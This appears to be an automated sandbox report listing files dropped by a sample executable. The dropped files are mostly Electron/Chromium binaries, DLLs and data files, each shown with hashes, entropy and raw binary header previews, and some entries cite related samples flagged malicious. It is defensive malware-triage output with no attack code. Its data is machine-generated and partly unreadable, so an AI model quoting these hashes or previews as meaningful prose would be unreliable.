                                                                                                                                                                      Preview:@...e.................................$.3............@..........H..............@-....f.J.|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):160084992
                                                                                                                                                                      Entropy (8bit):6.744040501876811
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1572864:/LBZB52nvuZ7wVuMbgR7Sp6kYdEctmhoLsPagBsgkx52HYhwj+vfIBUdoJnP9Dj0:/ypCmJctBjj2+Jv
                                                                                                                                                                      MD5:4DE03596272B7D7B70FF34893D072F21
                                                                                                                                                                      SHA1:BC07189E5B35BC6AE9319E07ED107EDCA583231E
                                                                                                                                                                      SHA-256:1D8AB53874B2EDFB058DD64DA8A61D92C8A8E302CC737155E0D718DBE169BA36
                                                                                                                                                                      SHA-512:9C63702A0F07E2104C161036CE269CF7C4516DFC97C1D9DF979FE42757D6020CACDC2186AF8BDA9E6EAAB7D010D882372F52553CB5EBC7F890A84137D1654A40
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........."......0...T.......F.........@..........................................`...........................................+.. ..0"..h............Pt.._@..........P.......!.......................!.(... Q..@...........@8......`.*......................text...:/.......0.................. ..`.rdata..h.n..@....n..4..............@..@.data....TB...1.......1.............@....pdata..._@..Pt..`@...9.............@..@.00cfg..0.............z.............@..@.gxfg...pA.......B....z.............@..@.retplne.............Dz..................rodata...... .......Fz............. ..`.tls.........@.......Xz.............@...CPADinfo8....P.......\z.............@...LZMADEC......`.......^z............. ..`_RDATA..\............pz.............@..@malloc_h+............rz............. ..`.rsrc................xz.............@..@.reloc......P........|.............@..B................
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1096
                                                                                                                                                                      Entropy (8bit):5.13006727705212
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                      MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                      SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                      SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                      SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8312662
                                                                                                                                                                      Entropy (8bit):4.705814170451806
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:dbTy6TU675kfWScRQfJw91SmfJB6i6e6R626X8HHdE/pG6:tygpj
                                                                                                                                                                      MD5:312446EDF757F7E92AAD311F625CEF2A
                                                                                                                                                                      SHA1:91102D30D5ABCFA7B6EC732E3682FB9C77279BA3
                                                                                                                                                                      SHA-256:C2656201AC86438D062673771E33E44D6D5E97670C3160E0DE1CB0BD5FBBAE9B
                                                                                                                                                                      SHA-512:DCE01F2448A49A0E6F08BBDE6570F76A87DCC81179BB51D5E2642AD033EE81AE3996800363826A65485AB79085572BBACE51409AE7102ED1A12DF65018676333
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title" style="float:left;">Credits</span>.<a id="print-link" href="#" style="float:right;" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may us
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):127125
                                                                                                                                                                      Entropy (8bit):7.915612661029362
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:vlKzwqCT4wDNzIwL2o418Gb0+VRLf0ld0GY3cQ39Vm2I:vlKzwt4uEgK18Gb0OV8ld0GecQ3f2
                                                                                                                                                                      MD5:ACD0FA0A90B43CD1C87A55A991B4FAC3
                                                                                                                                                                      SHA1:17B84E8D24DA12501105B87452F86BFA5F9B1B3C
                                                                                                                                                                      SHA-256:CCBCA246B9A93FA8D4F01A01345E7537511C590E4A8EFD5777B1596D10923B4B
                                                                                                                                                                      SHA-512:3E4C4F31C6C7950D5B886F6A8768077331A8F880D70B905CF7F35F74BE204C63200FF4A88FA236ABCCC72EC0FC102C14F50DD277A30F814F35ADFE5A7AE3B774
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):177406
                                                                                                                                                                      Entropy (8bit):7.939611912805236
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:4DQYaEQN6AJPKNzIwafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+HxNK/rIM0:4DQYaNN68QEVgx5GMRejnbdZnVE6YopY
                                                                                                                                                                      MD5:4610337E3332B7E65B73A6EA738B47DF
                                                                                                                                                                      SHA1:8D824C9CF0A84AB902E8069A4DE9BF6C1A9AAF3B
                                                                                                                                                                      SHA-256:C91ABF556E55C29D1EA9F560BB17CC3489CB67A5D0C7A22B58485F5F2FBCF25C
                                                                                                                                                                      SHA-512:039B50284D28DCD447E0A486A099FA99914D29B543093CCCDA77BBEFDD61F7B7F05BB84B2708AE128C5F2D0C0AB19046D08796D1B5A1CFF395A0689AB25CCB51
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4916712
                                                                                                                                                                      Entropy (8bit):6.398049523846958
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l
                                                                                                                                                                      MD5:2191E768CC2E19009DAD20DC999135A3
                                                                                                                                                                      SHA1:F49A46BA0E954E657AAED1C9019A53D194272B6A
                                                                                                                                                                      SHA-256:7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
                                                                                                                                                                      SHA-512:5ADCB00162F284C16EC78016D301FC11559DD0A781FFBEFF822DB22EFBED168B11D7E5586EA82388E9503B0C7D3740CF2A08E243877F5319202491C8A641C970
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Joe Sandbox View:
• Filename: nanophanotool.exe, Detection: malicious
• Filename: 9VbeqQbgU4.exe, Detection: malicious
• Filename: 9VbeqQbgU4.exe, Detection: malicious
• Filename: ivySCI-5.6.3.exe, Detection: malicious
• Filename: ivySCI-5.6.3.exe, Detection: malicious
• Filename: MayitaV16.exe, Detection: malicious
• Filename: Xa04iTOvv5.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: ArenaWarsSetup.exe, Detection: malicious
• Filename: ArenaWarsSetup.exe, Detection: malicious
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d...^.}`.........." ......8..........<).......................................K.....:FK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2883072
                                                                                                                                                                      Entropy (8bit):6.697367886822868
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:YGJO72cNsdMZWfAn1fdmZMOqcQrGhjUHgNxGUwSCmmfYDJGz5SN3lzl3hSKqH:Jj8n1QqGCmmfIUz59t
                                                                                                                                                                      MD5:E096C168B79A56DED0DF1AA142D9F1DA
                                                                                                                                                                      SHA1:318F20DAB294A315BD935160E9417FB5B28300F5
                                                                                                                                                                      SHA-256:65CC75329D17EC264E7A2DB571EA55F918394241445EA64569A56C75D0CFDC60
                                                                                                                                                                      SHA-512:3DCCF6CE85EF7E75690A5851642F10BB5E6E1572E91E933BACB7FCBFE405B0412B94BA0E160C3BA8D68D2B9AFC1DA268F61C83DCCD6453D8C9470931EE900BFD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$#..................................................@B...........`A..........................................*.......*.(.............@...............B..3....).......................).(....R#.@............"*.P............................text....##......$#................. ..`.rdata..l....@#......(#.............@..@.data...x.....*.."....*.............@....pdata........@.......*.............@..@.00cfg..8.....A.......+.............@..@.gxfg....,....A.......+.............@..@.retplne......A.......+..................tls..........A.......+.............@..._RDATA..\.....A.......+.............@..@.reloc...3....B..4....+.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):10542048
                                                                                                                                                                      Entropy (8bit):6.277141340322909
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:OKPBQYOo+ddlymOk25flQCUliXUxiG9Ha93Whla6ZGdnp/8k:OKPBhORjOhCliXUxiG9Ha93Whla6ZGrn
                                                                                                                                                                      MD5:D89CE8C00659D8E5D408C696EE087CE3
                                                                                                                                                                      SHA1:49FC8109960BE3BB32C06C3D1256CB66DDED19A8
                                                                                                                                                                      SHA-256:9DFBE0DAD5C7021CFE8DF7F52458C422CBC5BE9E16FF33EC90665BB1E3F182DE
                                                                                                                                                                      SHA-512:DB097CE3EB9E132D0444DF79B167A7DCB2DF31EFFBBD3DF72DA3D24AE2230CC5213C6DF5E575985A9918FBD0A6576E335B6EBC12B6258BC93FA205399DE64C37
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .Q....B.......B...#...B.. $...B..p$...B...$...B...%...B..`P...C...P...C...Q..(C......<C.....OC......bC..@...uC.......C..P....C.......C.......C..p....C.. ....C.......C.......D..p... D.....3D..0...FD.....YD.....lD.......D......D..0....D.......D..p....D......D..@....D.......E......E..@...*E.....=E..P...NE......bE.....rE..@....E.......E.......E..P....E.......E......E..@....F.......F.....'F..0...7F..P...JF......aF......qF...G...F.. H...F..`K...F...K...F...L...F...-...F...c...G....'.'G....'.>G..@.'.UG..0.'.oG....'..G...!'..G...!'..G..P&'..G...)'..G..@*'..H..`.(..H...e).7H..0.).VH...)*.xH....*..H....*..H...P+..H...Y+..H...Z+..I...]+. I..`^+.9I.. .+.UI....+.lI....+..I..P.-..I...=...I.......I.......I.. ....J..p....J......-J..p...EJ......ZJ......rJ..`....J..@....J.......J.......J..0....J.......J.......J..0....K..@....K..../.2K...,/.GK..../.\K..
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):481280
                                                                                                                                                                      Entropy (8bit):6.330677392522242
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:F9L2FFtoVsruIzUEzUST6uHKw+BubaOQ74PlqF8:F9CGafznzUSTRY70I
                                                                                                                                                                      MD5:1EECFB04C4434F5A813C8F0C0C8F2C88
                                                                                                                                                                      SHA1:6DC3CA4B3F72E7FB33BA26FA488DE323EDB59ADD
                                                                                                                                                                      SHA-256:897CEB95FB164640DDD2426673997B5F6FC2619FD916B038B575A70A0682A706
                                                                                                                                                                      SHA-512:D7818A42A76508AC3150AEA8D4E168B2DB36F55F71983A177002086380A82E307624CFE37B01FFC3D7EB407485D182654D0D7C6A0C06CCAAE60666630469C7E0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$................................................................`A........................................00......F>..(.......x.... ...C..............0....(.......................'..(...@A..@...........pA...............................text....".......$.................. ..`.rdata.......@.......(..............@..@.data....L....... ..................@....pdata...C... ...D..................@..@.00cfg..8....p......................@..@.gxfg...`$.......&..................@..@.retplne.............>...................tls....!............@..............@..._RDATA..\............B..............@..@.rsrc...x............D..............@..@.reloc..0............J..............@..B................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7625728
                                                                                                                                                                      Entropy (8bit):6.463180789552528
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:U8qvGdDtslh+LD3ZDWfnSvBSDU5bPm3k89Ld3gsOMt/:JD3ZXJ7bPWLWsD/
                                                                                                                                                                      MD5:CBA2436016F7A2838588A52D5B6F30F1
                                                                                                                                                                      SHA1:81DDF44B3E122DFBEE1A2CD8D4544364F1A621A4
                                                                                                                                                                      SHA-256:BCB3A3D2FCA3C33FA3D1D5DC976AA913CDC8001DF8E64C2CD3D2C545245141BF
                                                                                                                                                                      SHA-512:D92A880B5F83C5AE10AE9A83E38A293BB0E8C7659DD6ECE162FC752D57C9FCDE8036B81B023CD9F0F4F32B95B06FD4C366E20301010354B6CB904398A3149A44
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......Z...........M......................................`u...........`A..........................................k.8.....l.d....pt.......q.lO............t......vk.....................huk.(.....Z.@.............l.......k.@....................text...e.Z.......Z................. ..`.rdata..l.....Z.......Z.............@..@.data.........m..|....m.............@....pdata..lO....q..P....q.............@..@.00cfg..8.....t......Ps.............@..@.gxfg....+....t..,...Rs.............@..@.retplne.....@t......~s..................tls....:....Pt.......s.............@..._RDATA..\....`t.......s.............@..@.rsrc........pt.......s.............@..@.reloc........t.......s.............@..B................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):377708
                                                                                                                                                                      Entropy (8bit):5.4079285675542845
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:ebGJWQdLX/Wi6fR9a5DhZ2FQPnUGSBhjA636Zi2Jyn9Ybt5KXpgmLwSVxJsVxSjf:6GJW2bOi6fRmZ2OPnUThjA636Zi2Jynd
                                                                                                                                                                      MD5:7E51349EDC7E6AED122BFA00970FAB80
                                                                                                                                                                      SHA1:EB6DF68501ECCE2090E1AF5837B5F15AC3A775EB
                                                                                                                                                                      SHA-256:F528E698B164283872F76DF2233A47D7D41E1ABA980CE39F6B078E577FD14C97
                                                                                                                                                                      SHA-512:69DA19053EB95EEF7AB2A2D3F52CA765777BDF976E5862E8CEBBAA1D1CE84A7743F50695A3E82A296B2F610475ABB256844B6B9EB7A23A60B4A9FC4EAE40346D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):613642
                                                                                                                                                                      Entropy (8bit):4.894733266944232
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:b3pIuPzq8xSTwO8sgjZz5E9VJAVtnuviQix30jH8+I:b3plq8xLO8zjZz5E9VJAVtSiQO
                                                                                                                                                                      MD5:2009647C3E7AED2C4C6577EE4C546E19
                                                                                                                                                                      SHA1:E2BBACF95EC3695DAAE34835A8095F19A782CBCF
                                                                                                                                                                      SHA-256:6D61E5189438F3728F082AD6F694060D7EE8E571DF71240DFD5B77045A62954E
                                                                                                                                                                      SHA-512:996474D73191F2D550C516ED7526C9E2828E2853FCFBE87CA69D8B1242EB0DEDF04030BBCA3E93236BBD967D39DE7F9477C73753AF263816FAF7D4371F363BA3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):671738
                                                                                                                                                                      Entropy (8bit):4.903433286644294
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:gjptqBycpX8vYULIrmhkH+P5NNb++YTzgpPMgSENeX:BB2um5S++
                                                                                                                                                                      MD5:47A6D10B4112509852D4794229C0A03B
                                                                                                                                                                      SHA1:2FB49A0B07FBDF8D4CE51A7B5A7F711F47A34951
                                                                                                                                                                      SHA-256:857FE3AB766B60A8D82B7B6043137E3A7D9F5CFB8DDD942316452838C67D0495
                                                                                                                                                                      SHA-512:5F5B280261195B8894EFAE9DF2BECE41C6C6A72199D65BA633C30D50A579F95FA04916A30DB77831F517B22449196D364D6F70D10D6C5B435814184B3BCF1667
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):701716
                                                                                                                                                                      Entropy (8bit):4.66095894344634
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:7Od6KqVw2iILlY+dAs1aQUfjoaVV4FH2mFxvx35uKN3CuKb7szmV2Jfu64K+z5jG:KsKqJi6lY+dAs1aQU7yZx35uK4XQzQI9
                                                                                                                                                                      MD5:A19269683A6347E07C55325B9ECC03A4
                                                                                                                                                                      SHA1:D42989DAF1C11FCFFF0978A4FB18F55EC71630EC
                                                                                                                                                                      SHA-256:AD65351A240205E881EF5C4CF30AD1BC6B6E04414343583597086B62D48D8A24
                                                                                                                                                                      SHA-512:1660E487DF3F3F4EC1CEA81C73DCA0AB86AAF121252FBD54C7AC091A43D60E1AFD08535B082EFD7387C12616672E78AA52DDDFCA01F833ABEF244284482F2C76
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):904943
                                                                                                                                                                      Entropy (8bit):4.273773274227575
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:wqf22AwWk+ADszaaH0PaMadiMNKVbVtQW01jilDouMGsW2uMBVr+9RU4yVS5PMxq:1zW/AMfafVoCp8YbkJBbdJ2DB5y0XlRB
                                                                                                                                                                      MD5:5CDD07FA357C846771058C2DB67EB13B
                                                                                                                                                                      SHA1:DEB87FC5C13DA03BE86F67526C44F144CC65F6F6
                                                                                                                                                                      SHA-256:01C830B0007B8CE6ACA46E26D812947C3DF818927B826F7D8C5FFD0008A32384
                                                                                                                                                                      SHA-512:2AC29A3AA3278BD9A8FE1BA28E87941F719B14FBF8B52E0B7DC9D66603C9C147B9496BF7BE4D9E3AA0231C024694EF102DCC094C80C42BE5D68D3894C488098C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):426906
                                                                                                                                                                      Entropy (8bit):5.400864409916039
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:+XnGrijIs3cSlFEYLCJBB43nbhjJSwmrwiwWzM1ldLbpuQ16BtryBBwIle3nei3X:iNV4ossMNu51hnW5CptA
                                                                                                                                                                      MD5:D259469E94F2ADF54380195555154518
                                                                                                                                                                      SHA1:D69060BBE8E765CA4DC1F7D7C04C3C53C44B8AB5
                                                                                                                                                                      SHA-256:F98B7442BEFC285398A5DD6A96740CBA31D2F5AADADD4D5551A05712D693029B
                                                                                                                                                                      SHA-512:D0BD0201ACF4F7DAA84E89AA484A3DEC7B6A942C3115486716593213BE548657AD702EF2BC1D3D95A4A56B0F6E7C33D5375F41D6A863E4CE528F2BD6A318240E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):436202
                                                                                                                                                                      Entropy (8bit):5.843819816549512
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:U4ftEfqE2jv7ShUjBA59wjd558YAGKND9Gto8QV:U41HE2jjShqywjd558YAbNDcI
                                                                                                                                                                      MD5:04A680847C4A66AD9F0A88FB9FB1FC7B
                                                                                                                                                                      SHA1:2AFCDF4234A9644FB128B70182F5A3DF1EE05BE1
                                                                                                                                                                      SHA-256:1CC44C5FBE1C0525DF37C5B6267A677F79C9671F86EDA75B6FC13ABF5D5356EB
                                                                                                                                                                      SHA-512:3A8A409A3C34149A977DEA8A4CB0E0822281AED2B0A75B02479C95109D7D51F6FB2C2772CCF1486CA4296A0AC2212094098F5CE6A1265FA6A7EB941C0CFEF83E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):396104
                                                                                                                                                                      Entropy (8bit):5.454826678090317
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:Q3rSn4RJ28687mlwlGXaJwZkqEb1Phv6VP5yarXGzOJixhd4/TWwS:eND/xqkqEO5nrFTq
                                                                                                                                                                      MD5:1A53D374B9C37F795A462AAC7A3F118F
                                                                                                                                                                      SHA1:154BE9CF05042ECED098A20FF52FA174798E1FEA
                                                                                                                                                                      SHA-256:D0C38EB889EE27D81183A0535762D8EF314F0FDEB90CCCA9176A0CE9AB09B820
                                                                                                                                                                      SHA-512:395279C9246BD30A0E45D775D9F9C36353BD11D9463282661C2ABD876BDB53BE9C9B617BB0C2186592CD154E9353EA39E3FEED6B21A07B6850AB8ECD57E1ED29
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):424277
                                                                                                                                                                      Entropy (8bit):5.503137231857292
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:TFigju3qg4wajEzUKnYm31SOmhqYl51gHNiOIkCJD:TFiecqg1aqHSOu599kCJD
                                                                                                                                                                      MD5:8E6654B89ED4C1DC02E1E2D06764805A
                                                                                                                                                                      SHA1:FF660BC85BB4A0FA3B2637050D2B2D1AECC37AD8
                                                                                                                                                                      SHA-256:61CBCE9A31858DDF70CC9B0C05FB09CE7032BFB8368A77533521722465C57475
                                                                                                                                                                      SHA-512:5AC71EDA16F07F3F2B939891EDA2969C443440350FD88AB3A9B3180B8B1A3ECB11E79E752CF201F21B3DBFBA00BCC2E4F796F347E6137A165C081E86D970EE61
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):769050
                                                                                                                                                                      Entropy (8bit):4.75072843480339
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:H/58dBquNw2202pgtZSWjZ4LIbsJvaP5A3HKQiEQBR07391qf2utKMaBlS9WffFR:H8BquNw2202pgtsWjyLrJvaRA3HtiEQG
                                                                                                                                                                      MD5:9528D21E8A3F5BAD7CA273999012EBE8
                                                                                                                                                                      SHA1:58CD673CE472F3F2F961CF8B69B0C8B8C01D457C
                                                                                                                                                                      SHA-256:E79C1E7A47250D88581E8E3BAF78DCAF31FE660B74A1E015BE0F4BAFDFD63E12
                                                                                                                                                                      SHA-512:165822C49CE0BDB82F3C3221E6725DAC70F53CFDAD722407A508FA29605BC669FB5E5070F825F02D830E0487B28925644438305372A366A3D60B55DA039633D7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5245458
                                                                                                                                                                      Entropy (8bit):7.995476669559971
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:98304:HLYxfQVcnNWz49PDq2AwpmqdhBh1Dd42cjrwrbHw4o0DPelwG3RC:H0pQGcMButuBhpd4jkrU4oeelrRC
                                                                                                                                                                      MD5:7D5065ECBA284ED704040FCA1C821922
                                                                                                                                                                      SHA1:095FCC890154A52AD1998B4B1E318F99B3E5D6B8
                                                                                                                                                                      SHA-256:A10C3D236246E001CB9D434A65FC3E8AA7ACDDDDD9608008DB5C5C73DEE0BA1F
                                                                                                                                                                      SHA-512:521B2266E3257ADAA775014F77B0D512FF91B087C2572359D68FFE633B57A423227E3D5AF8EE4494538F1D09AA45FFA1FE8E979814178512C37F7088DDD7995D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):273328
                                                                                                                                                                      Entropy (8bit):3.2521181832662194
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:MpeVehd7eASb6iAGm4hmWRSJTnBSki+TfUNp2Zg+TEJ0xEI2tWaw8MCZ72T04GO9:YdyNm4mWRSJTBSXsU1vJzbYB
                                                                                                                                                                      MD5:8915DD2A6D6B4EBF9A16C77FE063D8DE
